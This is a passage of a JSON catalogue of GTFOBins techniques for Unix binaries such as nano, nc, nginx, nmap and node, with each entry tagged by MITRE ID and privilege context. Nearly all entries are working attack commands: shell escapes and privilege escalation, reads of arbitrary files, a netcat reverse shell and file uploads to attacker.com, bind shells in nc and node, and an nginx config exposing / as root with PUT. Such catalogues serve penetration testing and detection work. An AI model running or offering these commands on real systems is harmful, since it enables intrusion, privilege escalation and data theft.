2>&0","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:shell:1:sudo","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano -s /bin/sh\n/bin/sh\n^T^T","description":"The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:shell:1:suid","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano -s '/bin/sh -p'\n/bin/sh -p\n^T^T","description":"The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:shell:1:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nano -s /bin/sh\n/bin/sh\n^T^T","description":"The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nasm:file-read:0:sudo","toolId":"gtfo:nasm","toolName":"nasm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nasm -@ /path/to/input-file","description":"The file content is treated as command line options and disclosed throught error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nasm/"]},{"id":"gtfo:nasm:file-read:0:suid","toolId":"gtfo:nasm","toolName":"nasm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nasm -@ /path/to/input-file","description":"The file content is treated as command line options and disclosed throught error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nasm/"]},{"id":"gtfo:nasm:file-read:0:unprivileged","toolId":"gtfo:nasm","toolName":"nasm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nasm -@ /path/to/input-file","description":"The file content is treated as command line options and disclosed throught error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nasm/"]},{"id":"gtfo:nc:bind-shell:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"nc -l -p 12345 -e /bin/sh","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:bind-shell:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"nc -l -p 12345 -e /bin/sh","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:bind-shell:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"nc -l -p 12345 -e /bin/sh","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:download:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc -l -p 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:download:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc -l -p 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:download:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"nc -l -p 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:download:1:sudo","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc attacker.com 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:download:1:suid","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc attacker.com 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:download:1:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"nc attacker.com 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:reverse-shell:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"nc -e /bin/sh attacker.com 12345","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:reverse-shell:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"nc -e /bin/sh attacker.com 12345","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:reverse-shell:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"nc -e /bin/sh attacker.com 12345","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:upload:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc -l -p 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:upload:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc -l -p 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:upload:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"nc -l -p 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:upload:1:sudo","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc attacker.com 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:upload:1:suid","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc attacker.com 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:nc:upload:1:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"nc attacker.com 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"]},{"id":"gtfo:ncdu:shell:0:sudo","toolId":"gtfo:ncdu","toolName":"ncdu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncdu\nb","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ncdu/"]},{"id":"gtfo:ncdu:shell:0:suid","toolId":"gtfo:ncdu","toolName":"ncdu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncdu\nb","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ncdu/"]},{"id":"gtfo:ncdu:shell:0:unprivileged","toolId":"gtfo:ncdu","toolName":"ncdu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ncdu\nb","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ncdu/"]},{"id":"gtfo:ncftp:shell:0:sudo","toolId":"gtfo:ncftp","toolName":"ncftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncftp\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ncftp/"]},{"id":"gtfo:ncftp:shell:0:suid","toolId":"gtfo:ncftp","toolName":"ncftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncftp\n!/bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ncftp/"]},{"id":"gtfo:ncftp:shell:0:unprivileged","toolId":"gtfo:ncftp","toolName":"ncftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ncftp\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ncftp/"]},{"id":"gtfo:needrestart:inherit:0:sudo","toolId":"gtfo:needrestart","toolName":"needrestart","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"echo '...' >/path/to/temp-file\nneedrestart -c /path/to/temp-file","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/needrestart/"]},{"id":"gtfo:needrestart:inherit:0:unprivileged","toolId":"gtfo:needrestart","toolName":"needrestart","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"echo '...' >/path/to/temp-file\nneedrestart -c /path/to/temp-file","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/needrestart/"]},{"id":"gtfo:neofetch:file-read:0:sudo","toolId":"gtfo:neofetch","toolName":"neofetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"neofetch --ascii /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/neofetch/"]},{"id":"gtfo:neofetch:file-read:0:unprivileged","toolId":"gtfo:neofetch","toolName":"neofetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"neofetch --ascii /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/neofetch/"]},{"id":"gtfo:neofetch:shell:0:sudo","toolId":"gtfo:neofetch","toolName":"neofetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh' >/path/to/temp-file\nneofetch --config /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/neofetch/"]},{"id":"gtfo:neofetch:shell:0:unprivileged","toolId":"gtfo:neofetch","toolName":"neofetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh' >/path/to/temp-file\nneofetch --config /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/neofetch/"]},{"id":"gtfo:nft:file-read:0:sudo","toolId":"gtfo:nft","toolName":"nft","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nft -f /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nft/"]},{"id":"gtfo:nft:file-read:0:unprivileged","toolId":"gtfo:nft","toolName":"nft","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nft -f /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nft/"]},{"id":"gtfo:nginx:download:0:sudo","toolId":"gtfo:nginx","toolName":"nginx","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"cat >/path/to/temp-file <<EOF\nuser root;\nhttp {\n server {\n listen 80;\n root /;\n autoindex on;\n dav_methods PUT;\n }\n}\nevents {}\nEOF\n\nnginx -c /path/to/temp-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nginx/"]},{"id":"gtfo:nginx:library-load:0:sudo","toolId":"gtfo:nginx","toolName":"nginx","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"cat >/path/to/temp-file <<EOF\nload_module /path/to/lib.so;\nEOF\n\nnginx -t -c /path/to/temp-file","description":"Alternatively, the `ssl_engine` directive can be used.","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nginx/"]},{"id":"gtfo:nginx:library-load:0:suid","toolId":"gtfo:nginx","toolName":"nginx","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"cat >/path/to/temp-file <<EOF\nload_module /path/to/lib.so;\nEOF\n\nnginx -t -c /path/to/temp-file","description":"Alternatively, the `ssl_engine` directive can be used.","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nginx/"]},{"id":"gtfo:nginx:library-load:0:unprivileged","toolId":"gtfo:nginx","toolName":"nginx","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"cat >/path/to/temp-file <<EOF\nload_module /path/to/lib.so;\nEOF\n\nnginx -t -c /path/to/temp-file","description":"Alternatively, the `ssl_engine` directive can be used.","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nginx/"]},{"id":"gtfo:nginx:upload:0:sudo","toolId":"gtfo:nginx","toolName":"nginx","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cat >/path/to/temp-file <<EOF\nuser root;\nhttp {\n server {\n listen 80;\n root /;\n autoindex on;\n dav_methods PUT;\n }\n}\nevents {}\nEOF\n\nnginx -c /path/to/temp-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nginx/"]},{"id":"gtfo:nice:shell:0:sudo","toolId":"gtfo:nice","toolName":"nice","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nice /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nice/"]},{"id":"gtfo:nice:shell:0:suid","toolId":"gtfo:nice","toolName":"nice","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nice /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nice/"]},{"id":"gtfo:nice:shell:0:unprivileged","toolId":"gtfo:nice","toolName":"nice","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nice /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nice/"]},{"id":"gtfo:nl:file-read:0:sudo","toolId":"gtfo:nl","toolName":"nl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nl -bn -w1 -s '' /path/to/input-file","description":"The read file content is corrupted by a leading space added to each line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nl/"]},{"id":"gtfo:nl:file-read:0:suid","toolId":"gtfo:nl","toolName":"nl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nl -bn -w1 -s '' /path/to/input-file","description":"The read file content is corrupted by a leading space added to each line.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nl/"]},{"id":"gtfo:nl:file-read:0:unprivileged","toolId":"gtfo:nl","toolName":"nl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nl -bn -w1 -s '' /path/to/input-file","description":"The read file content is corrupted by a leading space added to each line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nl/"]},{"id":"gtfo:nm:file-read:0:sudo","toolId":"gtfo:nm","toolName":"nm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nm /path/to/input-file","description":"The file content is treated as command line options and disclosed through error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nm/"]},{"id":"gtfo:nm:file-read:0:suid","toolId":"gtfo:nm","toolName":"nm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nm /path/to/input-file","description":"The file content is treated as command line options and disclosed through error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nm/"]},{"id":"gtfo:nm:file-read:0:unprivileged","toolId":"gtfo:nm","toolName":"nm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nm /path/to/input-file","description":"The file content is treated as command line options and disclosed through error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nm/"]},{"id":"gtfo:nmap:file-read:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nmap -iL /path/to/input-file","description":"The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:file-read:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nmap -iL /path/to/input-file","description":"The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:file-read:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nmap -iL /path/to/input-file","description":"The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:file-write:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nmap -oG=/path/to/output-file DATA","description":"The payload appears inside the regular nmap output.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:file-write:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nmap -oG=/path/to/output-file DATA","description":"The payload appears inside the regular nmap output.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:file-write:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"nmap -oG=/path/to/output-file DATA","description":"The payload appears inside the regular nmap output.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:inherit:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"inherit ← lua","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\nnmap --script=/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:inherit:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"inherit ← lua","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\nnmap --script=/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:inherit:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"inherit ← lua","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\nnmap --script=/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:shell:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nmap --interactive\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:shell:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nmap --interactive\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:nmap:shell:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nmap --interactive\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"]},{"id":"gtfo:node:bind-shell:0:sudo","toolId":"gtfo:node","toolName":"node","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen(12345)'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:bind-shell:0:suid","toolId":"gtfo:node","toolName":"node","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"]);\nrequire(\"net\").createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen(12345)'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:bind-shell:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen(12345)'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:download:0:sudo","toolId":"gtfo:node","toolName":"node","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"node -e 'require(\"http\").get(\"http://attacker.com/path/to/input-file\", res => res.pipe(require(\"fs\").createWriteStream(\"/path/to/output-file\")))'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:download:0:suid","toolId":"gtfo:node","toolName":"node","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"node -e 'require(\"http\").get(\"http://attacker.com/path/to/input-file\", res => res.pipe(require(\"fs\").createWriteStream(\"/path/to/output-file\")))'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:download:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"node -e 'require(\"http\").get(\"http://attacker.com/path/to/input-file\", res => 